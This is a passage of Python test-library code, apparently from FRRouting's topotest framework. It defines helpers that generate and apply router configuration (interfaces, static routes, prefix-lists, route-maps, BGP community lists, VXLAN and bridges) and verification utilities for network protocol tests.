logger.debug("Not a valid IPv6 address")
v6 = False
else:
return "ipv6"
if not v4 and not v6:
raise Exception(
"InvalidIpAddr", "%s is neither valid IPv4 or IPv6" " address" % ip_address
)
def check_address_types(addr_type=None):
"""
Checks environment variable set and compares with the current address type
"""
addr_types_env = os.environ.get("ADDRESS_TYPES")
if not addr_types_env:
addr_types_env = "dual"
if addr_types_env == "dual":
addr_types = ["ipv4", "ipv6"]
elif addr_types_env == "ipv4":
addr_types = ["ipv4"]
elif addr_types_env == "ipv6":
addr_types = ["ipv6"]
if addr_type is None:
return addr_types
if addr_type not in addr_types:
logger.debug(
"{} not in supported/configured address types {}".format(
addr_type, addr_types
)
)
return False
return True
def generate_ips(network, no_of_ips):
"""
Returns list of IPs.
based on start_ip and no_of_ips
* `network` : from here the ip will start generating,
start_ip will be
* `no_of_ips` : these many IPs will be generated
"""
ipaddress_list = []
if type(network) is not list:
network = [network]
for start_ipaddr in network:
if "/" in start_ipaddr:
start_ip = start_ipaddr.split("/")[0]
mask = int(start_ipaddr.split("/")[1])
addr_type = validate_ip_address(start_ip)
if addr_type == "ipv4":
start_ip = ipaddress.IPv4Address(unicode(start_ip))
step = 2 ** (32 - mask)
if addr_type == "ipv6":
start_ip = ipaddress.IPv6Address(unicode(start_ip))
step = 2 ** (128 - mask)
next_ip = start_ip
count = 0
while count < no_of_ips:
ipaddress_list.append("{}/{}".format(next_ip, mask))
if addr_type == "ipv6":
next_ip = ipaddress.IPv6Address(int(next_ip) + step)
else:
next_ip += step
count += 1
return ipaddress_list
def find_interface_with_greater_ip(topo, router, loopback=True, interface=True):
"""
Returns highest interface ip for ipv4/ipv6. If loopback is there then
it will return highest IP from loopback IPs otherwise from physical
interface IPs.
* `topo` : json file data
* `router` : router for which hightest interface should be calculated
"""
link_data = topo["routers"][router]["links"]
lo_list = []
interfaces_list = []
lo_exists = False
for destRouterLink, data in sorted(link_data.iteritems()):
if loopback:
if "type" in data and data["type"] == "loopback":
lo_exists = True
ip_address = topo["routers"][router]["links"][destRouterLink][
"ipv4"
].split("/")[0]
lo_list.append(ip_address)
if interface:
ip_address = topo["routers"][router]["links"][destRouterLink]["ipv4"].split(
"/"
)[0]
interfaces_list.append(ip_address)
if lo_exists:
return sorted(lo_list)[-1]
return sorted(interfaces_list)[-1]
def write_test_header(tc_name):
""" Display message at beginning of test case"""
count = 20
logger.info("*" * (len(tc_name) + count))
step("START -> Testcase : %s" % tc_name, reset=True)
logger.info("*" * (len(tc_name) + count))
def write_test_footer(tc_name):
""" Display message at end of test case"""
count = 21
logger.info("=" * (len(tc_name) + count))
logger.info("Testcase : %s -> PASSED", tc_name)
logger.info("=" * (len(tc_name) + count))
def interface_status(tgen, topo, input_dict):
"""
Delete ip route maps from device
* `tgen` : Topogen object
* `topo` : json file data
* `input_dict` : for which router, route map has to be deleted
Usage
-----
input_dict = {
"r3": {
"interface_list": ['eth1-r1-r2', 'eth2-r1-r3'],
"status": "down"
}
}
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
global frr_cfg
for router in input_dict.keys():
interface_list = input_dict[router]["interface_list"]
status = input_dict[router].setdefault("status", "up")
for intf in interface_list:
rnode = tgen.routers()[router]
interface_set_status(rnode, intf, status)
# Load config to router
load_config_to_router(tgen, router)
except Exception as e:
# handle any exception
logger.error("Error %s occured. Arguments %s.", e.message, e.args)
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def retry(attempts=3, wait=2, return_is_str=True, initial_wait=0, return_is_dict=False):
"""
Retries function execution, if return is an errormsg or exception
* `attempts`: Number of attempts to make
* `wait`: Number of seconds to wait between each attempt
* `return_is_str`: Return val is an errormsg in case of failure
* `initial_wait`: Sleeps for this much seconds before executing function
"""
def _retry(func):
@wraps(func)
def func_retry(*args, **kwargs):
_wait = kwargs.pop("wait", wait)
_attempts = kwargs.pop("attempts", attempts)
_attempts = int(_attempts)
if _attempts < 0:
raise ValueError("attempts must be 0 or greater")
if initial_wait > 0:
logger.info("Waiting for [%s]s as initial delay", initial_wait)
sleep(initial_wait)
_return_is_str = kwargs.pop("return_is_str", return_is_str)
_return_is_dict = kwargs.pop("return_is_str", return_is_dict)
for i in range(1, _attempts + 1):
try:
_expected = kwargs.setdefault("expected", True)
kwargs.pop("expected")
ret = func(*args, **kwargs)
logger.debug("Function returned %s" % ret)
if _return_is_str and isinstance(ret, bool) and _expected:
return ret
if (
isinstance(ret, str) or isinstance(ret, unicode)
) and _expected is False:
return ret
if _return_is_dict and isinstance(ret, dict):
return ret
if _attempts == i:
generate_support_bundle()
return ret
except Exception as err:
if _attempts == i:
generate_support_bundle()
logger.info("Max number of attempts (%r) reached", _attempts)
raise
else:
logger.info("Function returned %s", err)
if i < _attempts:
logger.info("Retry [#%r] after sleeping for %ss" % (i, _wait))
sleep(_wait)
func_retry._original = func
return func_retry
return _retry
class Stepper:
"""
Prints step number for the test case step being executed
"""
count = 1
def __call__(self, msg, reset):
if reset:
Stepper.count = 1
logger.info(msg)
else:
logger.info("STEP %s: '%s'", Stepper.count, msg)
Stepper.count += 1
def step(msg, reset=False):
"""
Call Stepper to print test steps. Need to reset at the beginning of test.
* ` msg` : Step message body.
* `reset` : Reset step count to 1 when set to True.
"""
_step = Stepper()
_step(msg, reset)
#############################################
# These APIs, will used by testcase
#############################################
def create_interfaces_cfg(tgen, topo, build=False):
"""
Create interface configuration for created topology. Basic Interface
configuration is provided in input json file.
Parameters
----------
* `tgen` : Topogen object
* `topo` : json file data
* `build` : Only for initial setup phase this is set as True.
Returns
-------
True or False
"""
result = False
topo = deepcopy(topo)
try:
for c_router, c_data in topo.iteritems():
interface_data = []
for destRouterLink, data in sorted(c_data["links"].iteritems()):
# Loopback interfaces
if "type" in data and data["type"] == "loopback":
interface_name = destRouterLink
else:
interface_name = data["interface"]
# Include vrf if present
if "vrf" in data:
interface_data.append(
"interface {} vrf {}".format(
str(interface_name), str(data["vrf"])
)
)
else:
interface_data.append("interface {}".format(str(interface_name)))
if "ipv4" in data:
intf_addr = c_data["links"][destRouterLink]["ipv4"]
if "delete" in data and data["delete"]:
interface_data.append("no ip address {}".format(intf_addr))
else:
interface_data.append("ip address {}".format(intf_addr))
if "ipv6" in data:
intf_addr = c_data["links"][destRouterLink]["ipv6"]
if "delete" in data and data["delete"]:
interface_data.append("no ipv6 address {}".format(intf_addr))
else:
interface_data.append("ipv6 address {}".format(intf_addr))
if "ipv6-link-local" in data:
intf_addr = c_data["links"][destRouterLink]["ipv6-link-local"]
if "delete" in data and data["delete"]:
interface_data.append("no ipv6 address {}".format(intf_addr))
else:
interface_data.append("ipv6 address {}\n".format(intf_addr))
result = create_common_configuration(
tgen, c_router, interface_data, "interface_config", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return result
def create_static_routes(tgen, input_dict, build=False):
"""
Create static routes for given router as defined in input_dict
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict should be in the format below:
# static_routes: list of all routes
# network: network address
# no_of_ip: number of next-hop address that will be configured
# admin_distance: admin distance for route/routes.
# next_hop: starting next-hop address
# tag: tag id for static routes
# vrf: VRF name in which static routes needs to be created
# delete: True if config to be removed. Default False.
Example:
"routers": {
"r1": {
"static_routes": [
{
"network": "100.0.20.1/32",
"no_of_ip": 9,
"admin_distance": 100,
"next_hop": "10.0.0.1",
"tag": 4001,
"vrf": "RED_A"
"delete": true
}
]
}
}
Returns
-------
errormsg(str) or True
"""
result = False
logger.debug("Entering lib API: create_static_routes()")
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "static_routes" not in input_dict[router]:
errormsg = "static_routes not present in input_dict"
logger.info(errormsg)
continue
static_routes_list = []
static_routes = input_dict[router]["static_routes"]
for static_route in static_routes:
del_action = static_route.setdefault("delete", False)
no_of_ip = static_route.setdefault("no_of_ip", 1)
network = static_route.setdefault("network", [])
if type(network) is not list:
network = [network]
admin_distance = static_route.setdefault("admin_distance", None)
tag = static_route.setdefault("tag", None)
vrf = static_route.setdefault("vrf", None)
interface = static_route.setdefault("interface", None)
next_hop = static_route.setdefault("next_hop", None)
nexthop_vrf = static_route.setdefault("nexthop_vrf", None)
ip_list = generate_ips(network, no_of_ip)
for ip in ip_list:
addr_type = validate_ip_address(ip)
if addr_type == "ipv4":
cmd = "ip route {}".format(ip)
else:
cmd = "ipv6 route {}".format(ip)
if interface:
cmd = "{} {}".format(cmd, interface)
if next_hop:
cmd = "{} {}".format(cmd, next_hop)
if nexthop_vrf:
cmd = "{} nexthop-vrf {}".format(cmd, nexthop_vrf)
if vrf:
cmd = "{} vrf {}".format(cmd, vrf)
if tag:
cmd = "{} tag {}".format(cmd, str(tag))
if admin_distance:
cmd = "{} {}".format(cmd, admin_distance)
if del_action:
cmd = "no {}".format(cmd)
static_routes_list.append(cmd)
result = create_common_configuration(
tgen, router, static_routes_list, "static_route", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: create_static_routes()")
return result
def create_prefix_lists(tgen, input_dict, build=False):
"""
Create ip prefix lists as per the config provided in input
JSON or input_dict
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
# pf_lists_1: name of prefix-list, user defined
# seqid: prefix-list seqid, auto-generated if not given by user
# network: criteria for applying prefix-list
# action: permit/deny
# le: less than or equal number of bits
# ge: greater than or equal number of bits
Example
-------
input_dict = {
"r1": {
"prefix_lists":{
"ipv4": {
"pf_list_1": [
{
"seqid": 10,
"network": "any",
"action": "permit",
"le": "32",
"ge": "30",
"delete": True
}
]
}
}
}
}
Returns
-------
errormsg or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
result = False
try:
for router in input_dict.keys():
if "prefix_lists" not in input_dict[router]:
errormsg = "prefix_lists not present in input_dict"
logger.debug(errormsg)
continue
config_data = []
prefix_lists = input_dict[router]["prefix_lists"]
for addr_type, prefix_data in prefix_lists.iteritems():
if not check_address_types(addr_type):
continue
for prefix_name, prefix_list in prefix_data.iteritems():
for prefix_dict in prefix_list:
if "action" not in prefix_dict or "network" not in prefix_dict:
errormsg = "'action' or network' missing in" " input_dict"
return errormsg
network_addr = prefix_dict["network"]
action = prefix_dict["action"]
le = prefix_dict.setdefault("le", None)
ge = prefix_dict.setdefault("ge", None)
seqid = prefix_dict.setdefault("seqid", None)
del_action = prefix_dict.setdefault("delete", False)
if seqid is None:
seqid = get_seq_id("prefix_lists", router, prefix_name)
else:
set_seq_id("prefix_lists", router, seqid, prefix_name)
if addr_type == "ipv4":
protocol = "ip"
else:
protocol = "ipv6"
cmd = "{} prefix-list {} seq {} {} {}".format(
protocol, prefix_name, seqid, action, network_addr
)
if le:
cmd = "{} le {}".format(cmd, le)
if ge:
cmd = "{} ge {}".format(cmd, ge)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
result = create_common_configuration(
tgen, router, config_data, "prefix_list", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def create_route_maps(tgen, input_dict, build=False):
"""
Create route-map on the devices as per the arguments passed
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
# route_maps: key, value pair for route-map name and its attribute
# rmap_match_prefix_list_1: user given name for route-map
# action: PERMIT/DENY
# match: key,value pair for match criteria. prefix_list, community-list,
large-community-list or tag. Only one option at a time.
# prefix_list: name of prefix list
# large-community-list: name of large community list
# community-ist: name of community list
# tag: tag id for static routes
# set: key, value pair for modifying route attributes
# localpref: preference value for the network
# med: metric value advertised for AS
# aspath: set AS path value
# weight: weight for the route
# community: standard community value to be attached
# large_community: large community value to be attached
# community_additive: if set to "additive", adds community/large-community
value to the existing values of the network prefix
Example:
--------
input_dict = {
"r1": {
"route_maps": {
"rmap_match_prefix_list_1": [
{
"action": "PERMIT",
"match": {
"ipv4": {
"prefix_list": "pf_list_1"
}
"ipv6": {
"prefix_list": "pf_list_1"
}
"large-community-list": {
"id": "community_1",
"exact_match": True
}
"community_list": {
"id": "community_2",
"exact_match": True
}
"tag": "tag_id"
},
"set": {
"locPrf": 150,
"metric": 30,
"path": {
"num": 20000,
"action": "prepend",
},
"weight": 500,
"community": {
"num": "1:2 2:3",
"action": additive
}
"large_community": {
"num": "1:2:3 4:5;6",
"action": additive
},
}
}
]
}
}
}
Returns
-------
errormsg(str) or True
"""
result = False
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "route_maps" not in input_dict[router]:
logger.debug("route_maps not present in input_dict")
continue
rmap_data = []
for rmap_name, rmap_value in input_dict[router]["route_maps"].iteritems():
for rmap_dict in rmap_value:
del_action = rmap_dict.setdefault("delete", False)
if del_action:
rmap_data.append("no route-map {}".format(rmap_name))
continue
if "action" not in rmap_dict:
errormsg = "action not present in input_dict"
logger.error(errormsg)
return False
rmap_action = rmap_dict.setdefault("action", "deny")
seq_id = rmap_dict.setdefault("seq_id", None)
if seq_id is None:
seq_id = get_seq_id("route_maps", router, rmap_name)
else:
set_seq_id("route_maps", router, seq_id, rmap_name)
rmap_data.append(
"route-map {} {} {}".format(rmap_name, rmap_action, seq_id)
)
if "continue" in rmap_dict:
continue_to = rmap_dict["continue"]
if continue_to:
rmap_data.append("on-match goto {}".format(continue_to))
else:
logger.error(
"In continue, 'route-map entry "
"sequence number' is not provided"
)
return False
if "goto" in rmap_dict:
go_to = rmap_dict["goto"]
if go_to:
rmap_data.append("on-match goto {}".format(go_to))
else:
logger.error(
"In goto, 'Goto Clause number' is not" " provided"
)
return False
if "call" in rmap_dict:
call_rmap = rmap_dict["call"]
if call_rmap:
rmap_data.append("call {}".format(call_rmap))
else:
logger.error(
"In call, 'destination Route-Map' is" " not provided"
)
return False
# Verifying if SET criteria is defined
if "set" in rmap_dict:
set_data = rmap_dict["set"]
ipv4_data = set_data.setdefault("ipv4", {})
ipv6_data = set_data.setdefault("ipv6", {})
local_preference = set_data.setdefault("locPrf", None)
metric = set_data.setdefault("metric", None)
as_path = set_data.setdefault("path", {})
weight = set_data.setdefault("weight", None)
community = set_data.setdefault("community", {})
large_community = set_data.setdefault("large_community", {})
large_comm_list = set_data.setdefault("large_comm_list", {})
set_action = set_data.setdefault("set_action", None)
nexthop = set_data.setdefault("nexthop", None)
origin = set_data.setdefault("origin", None)
ext_comm_list = set_data.setdefault("extcommunity", {})
# Local Preference
if local_preference:
rmap_data.append(
"set local-preference {}".format(local_preference)
)
# Metric
if metric:
rmap_data.append("set metric {} \n".format(metric))
# Origin
if origin:
rmap_data.append("set origin {} \n".format(origin))
# AS Path Prepend
if as_path:
as_num = as_path.setdefault("as_num", None)
as_action = as_path.setdefault("as_action", None)
if as_action and as_num:
rmap_data.append(
"set as-path {} {}".format(as_action, as_num)
)
# Community
if community:
num = community.setdefault("num", None)
comm_action = community.setdefault("action", None)
if num:
cmd = "set community {}".format(num)
if comm_action:
cmd = "{} {}".format(cmd, comm_action)
rmap_data.append(cmd)
else:
logger.error("In community, AS Num not" " provided")
return False
if large_community:
num = large_community.setdefault("num", None)
comm_action = large_community.setdefault("action", None)
if num:
cmd = "set large-community {}".format(num)
if comm_action:
cmd = "{} {}".format(cmd, comm_action)
rmap_data.append(cmd)
else:
logger.error(
"In large_community, AS Num not" " provided"
)
return False
if large_comm_list:
id = large_comm_list.setdefault("id", None)
del_comm = large_comm_list.setdefault("delete", None)
if id:
cmd = "set large-comm-list {}".format(id)
if del_comm:
cmd = "{} delete".format(cmd)
rmap_data.append(cmd)
else:
logger.error("In large_comm_list 'id' not" " provided")
return False
if ext_comm_list:
rt = ext_comm_list.setdefault("rt", None)
del_comm = ext_comm_list.setdefault("delete", None)
if rt:
cmd = "set extcommunity rt {}".format(rt)
if del_comm:
cmd = "{} delete".format(cmd)
rmap_data.append(cmd)
else:
logger.debug("In ext_comm_list 'rt' not" " provided")
return False
# Weight
if weight:
rmap_data.append("set weight {}".format(weight))
if ipv6_data:
nexthop = ipv6_data.setdefault("nexthop", None)
if nexthop:
rmap_data.append("set ipv6 next-hop {}".format(nexthop))
# Adding MATCH and SET sequence to RMAP if defined
if "match" in rmap_dict:
match_data = rmap_dict["match"]
ipv4_data = match_data.setdefault("ipv4", {})
ipv6_data = match_data.setdefault("ipv6", {})
community = match_data.setdefault("community_list", {})
large_community = match_data.setdefault("large_community", {})
large_community_list = match_data.setdefault(
"large_community_list", {}
)
metric = match_data.setdefault("metric", None)
source_vrf = match_data.setdefault("source-vrf", None)
if ipv4_data:
# fetch prefix list data from rmap
prefix_name = ipv4_data.setdefault("prefix_lists", None)
if prefix_name:
rmap_data.append(
"match ip address"
" prefix-list {}".format(prefix_name)
)
# fetch tag data from rmap
tag = ipv4_data.setdefault("tag", None)
if tag:
rmap_data.append("match tag {}".format(tag))
# fetch large community data from rmap
large_community_list = ipv4_data.setdefault(
"large_community_list", {}
)
large_community = match_data.setdefault(
"large_community", {}
)
if ipv6_data:
prefix_name = ipv6_data.setdefault("prefix_lists", None)
if prefix_name:
rmap_data.append(
"match ipv6 address"
" prefix-list {}".format(prefix_name)
)
# fetch tag data from rmap
tag = ipv6_data.setdefault("tag", None)
if tag:
rmap_data.append("match tag {}".format(tag))
# fetch large community data from rmap
large_community_list = ipv6_data.setdefault(
"large_community_list", {}
)
large_community = match_data.setdefault(
"large_community", {}
)
if community:
if "id" not in community:
logger.error(
"'id' is mandatory for "
"community-list in match"
" criteria"
)
return False
cmd = "match community {}".format(community["id"])
exact_match = community.setdefault("exact_match", False)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if large_community:
if "id" not in large_community:
logger.error(
"'id' is mandatory for "
"large-community-list in match "
"criteria"
)
return False
cmd = "match large-community {}".format(
large_community["id"]
)
exact_match = large_community.setdefault(
"exact_match", False
)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if large_community_list:
if "id" not in large_community_list:
logger.error(
"'id' is mandatory for "
"large-community-list in match "
"criteria"
)
return False
cmd = "match large-community {}".format(
large_community_list["id"]
)
exact_match = large_community_list.setdefault(
"exact_match", False
)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if source_vrf:
cmd = "match source-vrf {}".format(source_vrf)
rmap_data.append(cmd)
if metric:
cmd = "match metric {}".format(metric)
rmap_data.append(cmd)
result = create_common_configuration(
tgen, router, rmap_data, "route_maps", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def delete_route_maps(tgen, input_dict):
"""
Delete ip route maps from device
* `tgen` : Topogen object
* `input_dict` : for which router,
route map has to be deleted
Usage
-----
# Delete route-map rmap_1 and rmap_2 from router r1
input_dict = {
"r1": {
"route_maps": ["rmap_1", "rmap__2"]
}
}
result = delete_route_maps("ipv4", input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
route_maps = input_dict[router]["route_maps"][:]
rmap_data = input_dict[router]
rmap_data["route_maps"] = {}
for route_map_name in route_maps:
rmap_data["route_maps"].update({route_map_name: [{"delete": True}]})
return create_route_maps(tgen, input_dict)
def create_bgp_community_lists(tgen, input_dict, build=False):
"""
Create bgp community-list or large-community-list on the devices as per
the arguments passed. Takes list of communities in input.
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True
}
]
}
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
"""
result = False
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "bgp_community_lists" not in input_dict[router]:
errormsg = "bgp_community_lists not present in input_dict"
logger.debug(errormsg)
continue
config_data = []
community_list = input_dict[router]["bgp_community_lists"]
for community_dict in community_list:
del_action = community_dict.setdefault("delete", False)
community_type = community_dict.setdefault("community_type", None)
action = community_dict.setdefault("action", None)
value = community_dict.setdefault("value", "")
large = community_dict.setdefault("large", None)
name = community_dict.setdefault("name", None)
if large:
cmd = "bgp large-community-list"
else:
cmd = "bgp community-list"
if not large and not (community_type and action and value):
errormsg = (
"community_type, action and value are "
"required in bgp_community_list"
)
logger.error(errormsg)
return False
try:
community_type = int(community_type)
cmd = "{} {} {} {}".format(cmd, community_type, action, value)
except ValueError:
cmd = "{} {} {} {} {}".format(
cmd, community_type, name, action, value
)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
result = create_common_configuration(
tgen, router, config_data, "bgp_community_list", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def shutdown_bringup_interface(tgen, dut, intf_name, ifaceaction=False):
"""
Shutdown or bringup router's interface "
* `tgen` : Topogen object
* `dut` : Device under test
* `intf_name` : Interface name to be shut/no shut
* `ifaceaction` : Action, to shut/no shut interface,
by default is False
Usage
-----
dut = "r3"
intf = "r3-r1-eth0"
# Shut down ineterface
shutdown_bringup_interface(tgen, dut, intf, False)
# Bring up ineterface
shutdown_bringup_interface(tgen, dut, intf, True)
Returns
-------
errormsg(str) or True
"""
router_list = tgen.routers()
if ifaceaction:
logger.info("Bringing up interface : {}".format(intf_name))
else:
logger.info("Shutting down interface : {}".format(intf_name))
interface_set_status(router_list[dut], intf_name, ifaceaction)
def addKernelRoute(
tgen, router, intf, group_addr_range, next_hop=None, src=None, del_action=None
):
"""
Add route to kernel
Parameters:
-----------
* `tgen` : Topogen object
* `router`: router for which kernal routes needs to be added
* `intf`: interface name, for which kernal routes needs to be added
* `bindToAddress`: bind to <host>, an interface or multicast
address
returns:
--------
errormsg or True
"""
logger.debug("Entering lib API: addKernelRoute()")
rnode = tgen.routers()[router]
if type(group_addr_range) is not list:
group_addr_range = [group_addr_range]
for grp_addr in group_addr_range:
addr_type = validate_ip_address(grp_addr)
if addr_type == "ipv4":
if next_hop is not None:
cmd = "ip route add {} via {}".format(grp_addr, next_hop)
else:
cmd = "ip route add {} dev {}".format(grp_addr, intf)
if del_action:
cmd = "ip route del {}".format(grp_addr)
verify_cmd = "ip route"
elif addr_type == "ipv6":
if intf and src:
cmd = "ip -6 route add {} dev {} src {}".format(grp_addr, intf, src)
else:
cmd = "ip -6 route add {} via {}".format(grp_addr, next_hop)
verify_cmd = "ip -6 route"
if del_action:
cmd = "ip -6 route del {}".format(grp_addr)
logger.info("[DUT: {}]: Running command: [{}]".format(router, cmd))
output = rnode.run(cmd)
# Verifying if ip route added to kernal
result = rnode.run(verify_cmd)
logger.debug("{}\n{}".format(verify_cmd, result))
if "/" in grp_addr:
ip, mask = grp_addr.split("/")
if mask == "32" or mask == "128":
grp_addr = ip
if not re_search(r"{}".format(grp_addr), result) and mask is not "0":
errormsg = (
"[DUT: {}]: Kernal route is not added for group"
" address {} Config output: {}".format(router, grp_addr, output)
)
return errormsg
logger.debug("Exiting lib API: addKernelRoute()")
return True
def configure_vxlan(tgen, input_dict):
"""
Add and configure vxlan
* `tgen`: tgen onject
* `input_dict` : data for vxlan config
Usage:
------
input_dict= {
"dcg2":{
"vxlan":[{
"vxlan_name": "vxlan75100",
"vxlan_id": "75100",
"dstport": 4789,
"local_addr": "120.0.0.1",
"learning": "no",
"delete": True
}]
}
}
configure_vxlan(tgen, input_dict)
Returns:
-------
True or errormsg
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
if "vxlan" in input_dict[dut]:
for vxlan_dict in input_dict[dut]["vxlan"]:
cmd = "ip link "
del_vxlan = vxlan_dict.setdefault("delete", None)
vxlan_names = vxlan_dict.setdefault("vxlan_name", [])
vxlan_ids = vxlan_dict.setdefault("vxlan_id", [])
dstport = vxlan_dict.setdefault("dstport", None)
local_addr = vxlan_dict.setdefault("local_addr", None)
learning = vxlan_dict.setdefault("learning", None)
config_data = []
if vxlan_names and vxlan_ids:
for vxlan_name, vxlan_id in zip(vxlan_names, vxlan_ids):
cmd = "ip link"
if del_vxlan:
cmd = "{} del {} type vxlan id {}".format(
cmd, vxlan_name, vxlan_id
)
else:
cmd = "{} add {} type vxlan id {}".format(
cmd, vxlan_name, vxlan_id
)
if dstport:
cmd = "{} dstport {}".format(cmd, dstport)
if local_addr:
ip_cmd = "ip addr add {} dev {}".format(
local_addr, vxlan_name
)
if del_vxlan:
ip_cmd = "ip addr del {} dev {}".format(
local_addr, vxlan_name
)
config_data.append(ip_cmd)
cmd = "{} local {}".format(cmd, local_addr)
if learning == "no":
cmd = "{} nolearning".format(cmd)
elif learning == "yes":
cmd = "{} learning".format(cmd)
config_data.append(cmd)
try:
for _cmd in config_data:
logger.info("[DUT: %s]: Running command: %s", dut, _cmd)
rnode.run(_cmd)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def configure_brctl(tgen, topo, input_dict):
"""
Add and configure brctl
* `tgen`: tgen onject
* `input_dict` : data for brctl config
Usage:
------
input_dict= {
dut:{
"brctl": [{
"brctl_name": "br100",
"addvxlan": "vxlan75100",
"vrf": "RED",
"stp": "off"
}]
}
}
configure_brctl(tgen, topo, input_dict)
Returns:
-------
True or errormsg
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
if "brctl" in input_dict[dut]:
for brctl_dict in input_dict[dut]["brctl"]:
brctl_names = brctl_dict.setdefault("brctl_name", [])
addvxlans = brctl_dict.setdefault("addvxlan", [])
stp_values = brctl_dict.setdefault("stp", [])
vrfs = brctl_dict.setdefault("vrf", [])
ip_cmd = "ip link set"
for brctl_name, vxlan, vrf, stp in zip(
brctl_names, addvxlans, vrfs, stp_values
):
ip_cmd_list = []
cmd = "ip link add name {} type bridge stp_state {}".format(brctl_name, stp)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
ip_cmd_list.append("{} up dev {}".format(ip_cmd, brctl_name))
if vxlan:
cmd = "{} dev {} master {}".format(ip_cmd, vxlan, brctl_name)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
ip_cmd_list.append("{} up dev {}".format(ip_cmd, vxlan))
if vrf:
ip_cmd_list.append(
"{} dev {} master {}".format(ip_cmd, brctl_name, vrf)
)
for intf_name, data in topo["routers"][dut]["links"].items():
if "vrf" not in data:
continue
if data["vrf"] == vrf:
ip_cmd_list.append(
"{} up dev {}".format(ip_cmd, data["interface"])
)
try:
for _ip_cmd in ip_cmd_list:
logger.info("[DUT: %s]: Running command: %s", dut, _ip_cmd)
rnode.run(_ip_cmd)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def configure_interface_mac(tgen, input_dict):
"""
Add and configure brctl
* `tgen`: tgen onject
* `input_dict` : data for mac config
input_mac= {
"edge1":{
"br75100": "00:80:48:BA:d1:00,
"br75200": "00:80:48:BA:d1:00
}
}
configure_interface_mac(tgen, input_mac)
Returns:
-------
True or errormsg
"""
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
for intf, mac in input_dict[dut].items():
cmd = "ifconfig {} hw ether {}".format(intf, mac)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
try:
result = rnode.run(cmd)
if len(result) != 0:
return result
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return True
#############################################
# Verification APIs
#############################################
@retry(attempts=5, wait=2, return_is_str=True, initial_wait=2)
def verify_rib(
tgen,
addr_type,
dut,
input_dict,
next_hop=None,
protocol=None,
tag=None,
metric=None,
fib=None,
):
"""
Data will be read from input_dict or input JSON file, API will generate
same prefixes, which were redistributed by either create_static_routes() or
advertise_networks_using_network_command() and do will verify next_hop and
each prefix/routes is present in "show ip/ipv6 route {bgp/stataic} json"
command o/p.
Parameters
----------
* `tgen` : topogen object
* `addr_type` : ip type, ipv4/ipv6
* `dut`: Device Under Test, for which user wants to test the data
* `input_dict` : input dict, has details of static routes
* `next_hop`[optional]: next_hop which needs to be verified,
default: static
* `protocol`[optional]: protocol, default = None
Usage
-----
# RIB can be verified for static routes OR network advertised using
network command. Following are input_dicts to create static routes
and advertise networks using network command. Any one of the input_dict
can be passed to verify_rib() to verify routes in DUT"s RIB.
# Creating static routes for r1
input_dict = {
"r1": {
"static_routes": [{"network": "10.0.20.1/32", "no_of_ip": 9, \
"admin_distance": 100, "next_hop": "10.0.0.2", "tag": 4001}]
}}
# Advertising networks using network command in router r1
input_dict = {
"r1": {
